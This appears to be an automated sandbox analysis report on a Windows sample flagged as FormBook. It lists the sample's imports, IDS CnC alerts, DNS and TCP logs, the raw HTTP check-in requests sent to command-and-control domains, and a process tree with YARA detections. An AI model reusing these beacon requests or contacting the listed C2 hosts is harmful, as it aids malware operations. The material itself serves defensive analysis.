                                                                                                                                                                      KERNEL32.dllTlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, GetConsoleWindow, FreeConsole, AllocConsole, SetLastError, GetLastError, LocalFree, CloseHandle, ExitProcess, GetTickCount64, FormatMessageW, K32EnumProcessModulesEx, IsWow64Process, GetExitCodeProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, DuplicateHandle, GetCurrentProcess, CloseThreadpoolIo, GetCurrentProcessId, MultiByteToWideChar, GetStdHandle, RaiseFailFastException, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, FindStringOrdinal, GetCurrentThread, Sleep, DeleteCriticalSection, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, InitializeCriticalSection, InitializeConditionVariable, WaitForMultipleObjectsEx, QueryPerformanceFrequency, GetFullPathNameW, GetLongPathNameW, WideCharToMultiByte, LocalAlloc, GetConsoleOutputCP, GetProcAddress, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CreateFileW, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, GetThreadPriority, SetThreadPriority, WriteFile, GetCurrentProcessorNumberEx, SetEvent, CreateEventExW, GetEnvironmentVariableW, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, TerminateProcess, SwitchToThread, CreateThread, GetCurrentThreadId, SuspendThread, ResumeThread, GetThreadContext, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, VirtualQuery, GetSystemTimeAsFileTime, ResetEvent, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RaiseException, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlLookupFunctionEntry, InitializeSListHead
                                                                                                                                                                      ole32.dllCoGetApartmentType, CoTaskMemAlloc, CoUninitialize, CoInitializeEx, CoTaskMemFree, CoWaitForMultipleHandles
                                                                                                                                                                      api-ms-win-crt-heap-l1-1-0.dllmalloc, free, _callnewh, calloc, _set_new_mode
                                                                                                                                                                      api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                                                                                                                                      api-ms-win-crt-string-l1-1-0.dllstrcmp, _stricmp, strcpy_s, strncpy_s, wcsncmp
                                                                                                                                                                      api-ms-win-crt-convert-l1-1-0.dllstrtoull
                                                                                                                                                                      api-ms-win-crt-runtime-l1-1-0.dll__p___wargv, _cexit, exit, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, __p___argc, _exit, abort, _initterm_e, _c_exit, _register_thread_local_exe_atexit_callback, _seh_filter_exe, _set_app_type, _initterm, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment
                                                                                                                                                                      api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsprintf_s, __stdio_common_vfprintf, __p__commode, _set_fmode, __stdio_common_vsscanf, __acrt_iob_func
                                                                                                                                                                      api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                      2024-10-09T12:32:56.588967+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.6499943.33.130.19080TCP
                                                                                                                                                                      2024-10-09T12:32:56.588967+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.6499943.33.130.19080TCP
                                                                                                                                                                      2024-10-09T12:32:56.588967+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.6499943.33.130.19080TCP
                                                                                                                                                                      2024-10-09T12:32:56.588967+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649991172.96.187.8980TCP
                                                                                                                                                                      2024-10-09T12:32:56.588967+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649991172.96.187.8980TCP
                                                                                                                                                                      2024-10-09T12:32:56.588967+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649991172.96.187.8980TCP
                                                                                                                                                                      2024-10-09T12:33:41.057307+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649900103.235.47.18880TCP
                                                                                                                                                                      2024-10-09T12:33:41.057307+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649900103.235.47.18880TCP
                                                                                                                                                                      2024-10-09T12:33:41.057307+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649900103.235.47.18880TCP
                                                                                                                                                                      2024-10-09T12:34:40.120774+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649988104.18.14.10580TCP
                                                                                                                                                                      2024-10-09T12:34:40.120774+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649988104.18.14.10580TCP
                                                                                                                                                                      2024-10-09T12:34:40.120774+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649988104.18.14.10580TCP
                                                                                                                                                                      2024-10-09T12:36:43.677634+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.64999244.227.65.24580TCP
                                                                                                                                                                      2024-10-09T12:36:43.677634+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.64999244.227.65.24580TCP
                                                                                                                                                                      2024-10-09T12:36:43.677634+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.64999244.227.65.24580TCP
                                                                                                                                                                      2024-10-09T12:37:07.424803+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649993118.27.100.15180TCP
                                                                                                                                                                      2024-10-09T12:37:07.424803+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649993118.27.100.15180TCP
                                                                                                                                                                      2024-10-09T12:37:07.424803+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649993118.27.100.15180TCP
                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Oct 9, 2024 12:33:40.485089064 CEST4990080192.168.2.6103.235.47.188
                                                                                                                                                                      Oct 9, 2024 12:33:40.490004063 CEST8049900103.235.47.188192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:33:40.490106106 CEST4990080192.168.2.6103.235.47.188
                                                                                                                                                                      Oct 9, 2024 12:33:40.490159988 CEST4990080192.168.2.6103.235.47.188
                                                                                                                                                                      Oct 9, 2024 12:33:40.495204926 CEST8049900103.235.47.188192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:33:40.995414019 CEST4990080192.168.2.6103.235.47.188
                                                                                                                                                                      Oct 9, 2024 12:33:41.043732882 CEST8049900103.235.47.188192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:33:41.057113886 CEST8049900103.235.47.188192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:33:41.057307005 CEST4990080192.168.2.6103.235.47.188
                                                                                                                                                                      Oct 9, 2024 12:34:39.634556055 CEST4998880192.168.2.6104.18.14.105
                                                                                                                                                                      Oct 9, 2024 12:34:39.639595032 CEST8049988104.18.14.105192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:34:39.639676094 CEST4998880192.168.2.6104.18.14.105
                                                                                                                                                                      Oct 9, 2024 12:34:39.639781952 CEST4998880192.168.2.6104.18.14.105
                                                                                                                                                                      Oct 9, 2024 12:34:39.644768953 CEST8049988104.18.14.105192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:34:40.119968891 CEST8049988104.18.14.105192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:34:40.120281935 CEST4998880192.168.2.6104.18.14.105
                                                                                                                                                                      Oct 9, 2024 12:34:40.120718956 CEST8049988104.18.14.105192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:34:40.120774031 CEST4998880192.168.2.6104.18.14.105
                                                                                                                                                                      Oct 9, 2024 12:34:40.125361919 CEST8049988104.18.14.105192.168.2.6
                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Oct 9, 2024 12:33:39.106441021 CEST6246153192.168.2.61.1.1.1
                                                                                                                                                                      Oct 9, 2024 12:33:40.104801893 CEST6246153192.168.2.61.1.1.1
                                                                                                                                                                      Oct 9, 2024 12:33:40.483974934 CEST53624611.1.1.1192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:33:40.484014034 CEST53624611.1.1.1192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:33:58.996097088 CEST5891353192.168.2.61.1.1.1
                                                                                                                                                                      Oct 9, 2024 12:33:59.036238909 CEST53589131.1.1.1192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:34:19.208017111 CEST6104353192.168.2.61.1.1.1
                                                                                                                                                                      Oct 9, 2024 12:34:19.228391886 CEST53610431.1.1.1192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:34:39.417354107 CEST6132353192.168.2.61.1.1.1
                                                                                                                                                                      Oct 9, 2024 12:34:39.458134890 CEST53613231.1.1.1192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:35:00.074340105 CEST5706953192.168.2.61.1.1.1
                                                                                                                                                                      Oct 9, 2024 12:35:00.186707020 CEST53570691.1.1.1192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:35:20.816768885 CEST5952153192.168.2.61.1.1.1
                                                                                                                                                                      Oct 9, 2024 12:35:21.322597980 CEST53595211.1.1.1192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:35:41.226614952 CEST6476153192.168.2.61.1.1.1
                                                                                                                                                                      Oct 9, 2024 12:35:41.236011028 CEST53647611.1.1.1192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:36:01.847003937 CEST5697653192.168.2.61.1.1.1
                                                                                                                                                                      Oct 9, 2024 12:36:01.866771936 CEST53569761.1.1.1192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:36:22.471308947 CEST5832253192.168.2.61.1.1.1
                                                                                                                                                                      Oct 9, 2024 12:36:22.844423056 CEST53583221.1.1.1192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:36:43.138528109 CEST5080853192.168.2.61.1.1.1
                                                                                                                                                                      Oct 9, 2024 12:36:43.161221027 CEST53508081.1.1.1192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:37:03.699738026 CEST5711753192.168.2.61.1.1.1
                                                                                                                                                                      Oct 9, 2024 12:37:04.237265110 CEST53571171.1.1.1192.168.2.6
                                                                                                                                                                      Oct 9, 2024 12:37:25.527566910 CEST5178553192.168.2.61.1.1.1
                                                                                                                                                                      Oct 9, 2024 12:37:25.546631098 CEST53517851.1.1.1192.168.2.6
                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                      Oct 9, 2024 12:33:39.106441021 CEST192.168.2.61.1.1.10x33d2Standard query (0)www.zruypj169g.topA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:33:40.104801893 CEST192.168.2.61.1.1.10x33d2Standard query (0)www.zruypj169g.topA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:33:58.996097088 CEST192.168.2.61.1.1.10x7abcStandard query (0)www.teplo-invest.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:34:19.208017111 CEST192.168.2.61.1.1.10x9a78Standard query (0)www.zbbnp.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:34:39.417354107 CEST192.168.2.61.1.1.10xcab8Standard query (0)www.33mgbet.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:35:00.074340105 CEST192.168.2.61.1.1.10x4366Standard query (0)www.a1b5v.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:35:20.816768885 CEST192.168.2.61.1.1.10x8a31Standard query (0)www.lynxpire.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:35:41.226614952 CEST192.168.2.61.1.1.10xa100Standard query (0)www.chiri.latA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:36:01.847003937 CEST192.168.2.61.1.1.10x7ff1Standard query (0)www.rslotrank.winA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:36:22.471308947 CEST192.168.2.61.1.1.10xa7d1Standard query (0)www.partymaxclubmen36.clickA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:36:43.138528109 CEST192.168.2.61.1.1.10xe8acStandard query (0)www.tdshomesolution.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:37:03.699738026 CEST192.168.2.61.1.1.10x4430Standard query (0)www.onsen1508.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:37:25.527566910 CEST192.168.2.61.1.1.10xca0bStandard query (0)www.barnesassetrecovery.storeA (IP address)IN (0x0001)false
                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                      Oct 9, 2024 12:33:40.483974934 CEST1.1.1.1192.168.2.60x33d2No error (0)www.zruypj169g.topwww.baidu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:33:40.483974934 CEST1.1.1.1192.168.2.60x33d2No error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:33:40.483974934 CEST1.1.1.1192.168.2.60x33d2No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:33:40.483974934 CEST1.1.1.1192.168.2.60x33d2No error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:33:40.483974934 CEST1.1.1.1192.168.2.60x33d2No error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:33:40.484014034 CEST1.1.1.1192.168.2.60x33d2No error (0)www.zruypj169g.topwww.baidu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:33:40.484014034 CEST1.1.1.1192.168.2.60x33d2No error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:33:40.484014034 CEST1.1.1.1192.168.2.60x33d2No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:33:40.484014034 CEST1.1.1.1192.168.2.60x33d2No error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:33:40.484014034 CEST1.1.1.1192.168.2.60x33d2No error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:33:59.036238909 CEST1.1.1.1192.168.2.60x7abcName error (3)www.teplo-invest.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:34:19.228391886 CEST1.1.1.1192.168.2.60x9a78Name error (3)www.zbbnp.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:34:39.458134890 CEST1.1.1.1192.168.2.60xcab8No error (0)www.33mgbet.comcbmsource-web-5091.rejcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:34:39.458134890 CEST1.1.1.1192.168.2.60xcab8No error (0)cbmsource-web-5091.rejcdn.com104.18.14.105A (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:34:39.458134890 CEST1.1.1.1192.168.2.60xcab8No error (0)cbmsource-web-5091.rejcdn.com104.18.15.105A (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:35:00.186707020 CEST1.1.1.1192.168.2.60x4366Name error (3)www.a1b5v.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:35:21.322597980 CEST1.1.1.1192.168.2.60x8a31Name error (3)www.lynxpire.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:35:41.236011028 CEST1.1.1.1192.168.2.60xa100Name error (3)www.chiri.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:36:01.866771936 CEST1.1.1.1192.168.2.60x7ff1Name error (3)www.rslotrank.winnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:36:22.844423056 CEST1.1.1.1192.168.2.60xa7d1No error (0)www.partymaxclubmen36.clickpartymaxclubmen36.clickCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:36:22.844423056 CEST1.1.1.1192.168.2.60xa7d1No error (0)partymaxclubmen36.click172.96.187.89A (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:36:43.161221027 CEST1.1.1.1192.168.2.60xe8acNo error (0)www.tdshomesolution.compixie.porkbun.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:36:43.161221027 CEST1.1.1.1192.168.2.60xe8acNo error (0)pixie.porkbun.com44.227.65.245A (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:36:43.161221027 CEST1.1.1.1192.168.2.60xe8acNo error (0)pixie.porkbun.com44.227.76.166A (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:37:04.237265110 CEST1.1.1.1192.168.2.60x4430No error (0)www.onsen1508.com118.27.100.151A (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:37:25.546631098 CEST1.1.1.1192.168.2.60xca0bNo error (0)www.barnesassetrecovery.storebarnesassetrecovery.storeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:37:25.546631098 CEST1.1.1.1192.168.2.60xca0bNo error (0)barnesassetrecovery.store3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 9, 2024 12:37:25.546631098 CEST1.1.1.1192.168.2.60xca0bNo error (0)barnesassetrecovery.store15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                      • www.zruypj169g.top
                                                                                                                                                                      • www.33mgbet.com
                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.649900103.235.47.188804004C:\Windows\explorer.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Oct 9, 2024 12:33:40.490159988 CEST181OUTGET /md02/?oHH8=VZUPDXU8mXkToFn&0PG4QdD=KBMih/6UmjMCLIvQj8A+JVJ0ZduXlvkac/jrKRN7UGcA2YCWIWeuvW479UURmW6VwJBRFqK2PA== HTTP/1.1
                                                                                                                                                                      Host: www.zruypj169g.top
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      1192.168.2.649988104.18.14.105804004C:\Windows\explorer.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Oct 9, 2024 12:34:39.639781952 CEST178OUTGET /md02/?0PG4QdD=t+COfq1vjUEJQNGKuIffQF6Jo9EOeFI2rokLIpdDcdgn8qfouM+tADvwOSJNkXtOfnwg5pSvDA==&oHH8=VZUPDXU8mXkToFn HTTP/1.1
                                                                                                                                                                      Host: www.33mgbet.com
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Oct 9, 2024 12:34:40.119968891 CEST820INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Date: Wed, 09 Oct 2024 10:34:40 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 167
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                      Expires: Wed, 09 Oct 2024 11:34:40 GMT
                                                                                                                                                                      Location: https://www.33mgbet.com/md02/?0PG4QdD=t+COfq1vjUEJQNGKuIffQF6Jo9EOeFI2rokLIpdDcdgn8qfouM+tADvwOSJNkXtOfnwg5pSvDA==&oHH8=VZUPDXU8mXkToFn
                                                                                                                                                                      Set-Cookie: __cf_bm=Rc58U8.G.iqfDKM1KAycU.0EnlUwOqFCNKO2LyxheqQ-1728470080-1.0.1.1-.0BV1hY2eamOZxMCgNxVtzadDeMDPlL3sB9nrkWGR5Dzt4AkCJLiO8zusInuiu7lWZk5Yow043JvgUrgG25CkA; path=/; expires=Wed, 09-Oct-24 11:04:40 GMT; domain=.www.33mgbet.com; HttpOnly
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8cfdb8305e2b2361-EWR
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:06:32:58
                                                                                                                                                                      Start date:09/10/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\Iifpj4i2kC.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Iifpj4i2kC.exe"
                                                                                                                                                                      Imagebase:0x7ff67fa40000
                                                                                                                                                                      File size:1'627'744 bytes
                                                                                                                                                                      MD5 hash:F6E047942236CEFDCD6559BCA66A7B3E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:1
                                                                                                                                                                      Start time:06:32:58
                                                                                                                                                                      Start date:09/10/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:06:32:58
                                                                                                                                                                      Start date:09/10/2024
                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                      Wow64 process (32bit):
                                                                                                                                                                      Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                      Imagebase:
                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:06:32:59
                                                                                                                                                                      Start date:09/10/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):
                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe"
                                                                                                                                                                      Imagebase:
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:06:32:59
                                                                                                                                                                      Start date:09/10/2024
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                                                                                      Imagebase:0x870000
                                                                                                                                                                      File size:2'141'552 bytes
                                                                                                                                                                      MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
